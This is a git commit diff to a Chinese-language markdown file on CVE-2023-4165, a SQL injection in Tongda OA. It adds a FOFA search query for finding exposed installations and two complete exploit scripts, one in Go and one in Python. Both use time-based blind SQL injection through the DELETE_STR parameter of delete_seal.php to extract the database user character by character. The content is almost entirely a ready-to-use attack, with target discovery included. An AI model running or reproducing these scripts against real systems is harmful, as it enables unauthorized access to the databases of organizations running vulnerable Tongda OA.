Update 通达OA sql注入漏洞 CVE-2023-4165.md

2023-11-04 22:27:01 +08:00 · 2023-11-04 22:27:01 +08:00 · 129e5dcf62
commit 129e5dcf62
parent 96128a6dfc
1 changed files with 111 additions and 0 deletions
--- a/CVE-2023-4165.md
+++ b/CVE-2023-4165.md
@ -15,3 +15,114 @@ Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 ```
+## FOFA语法：
+```
+app="TDXK-通达OA" && icon_hash="-759108386"
+
+```
+## 利用脚本
+### go
+```go
+package main
+
+import (
+ "fmt"
+ "net/http"
+ "strings"
+ "time"
+)
+// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞
+func main() {
+ // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1  general/system/seal_manage/dianju/delete_log.php
+ url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php"                                                                                     // 目标网站的URL
+ delay := 2                                                                                                                                                          // 延迟时间，单位为秒
+ cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值
+
+ characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集
+
+ result := ""
+ for i := 1; i <= 30; i++ { // 假设字符的最大长度为30
+  found := false
+  for _, char := range characters {
+   payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload
+   //print(payload, "n")
+   req, err := http.NewRequest("GET", url, nil)
+   if err != nil {
+    fmt.Println("创建请求失败:", err)
+    return
+   }
+
+   // 使用分号分隔的每个Cookie项
+   cookieItems := strings.Split(cookieValue, "; ")
+   for _, item := range cookieItems {
+    itemSplit := strings.SplitN(item, "=", 2) // 按照等号（=）分隔键值对
+    if len(itemSplit) == 2 {
+     cookie := &http.Cookie{
+      Name:  itemSplit[0],
+      Value: itemSplit[1],
+     }
+     req.AddCookie(cookie)
+    }
+   }
+
+   req.URL.RawQuery = "DELETE_STR=" + payload //构建请求，其DELETE_STR是本次的注入参数
+
+   startTime := time.Now()
+   resp, err := http.DefaultClient.Do(req)
+   if err != nil {
+    fmt.Println("发送请求失败:", err)
+    return
+   }
+   defer resp.Body.Close()
+
+   endTime := time.Now()
+   responseTime := endTime.Sub(startTime)
+
+   if responseTime >= time.Duration(delay)*time.Second {
+    result += string(char)
+    fmt.Println("", result)
+    found = true
+    break
+   }
+  }
+
+  if !found {
+   break
+  }
+ }
+
+ fmt.Println("Database: " + result)
+}
+```
+
+### Python
+```python
+import requests
+import time
+
+headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"}
+
+characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-"
+
+url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR="
+
+result = ""
+
+for i in range(1,31):
+    found = False
+    for c in characters:
+        payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1"
+        start_time = time.time()
+        res = requests.get(url=url+payload,headers=headers)
+        end_time = time.time()
+        elapsed_time = end_time - start_time
+        
+        if elapsed_time >= 2:
+            result +=c
+            print(result)
+            found = True
+    if not found:
+        break
+    
+print("Databas:",result)
+```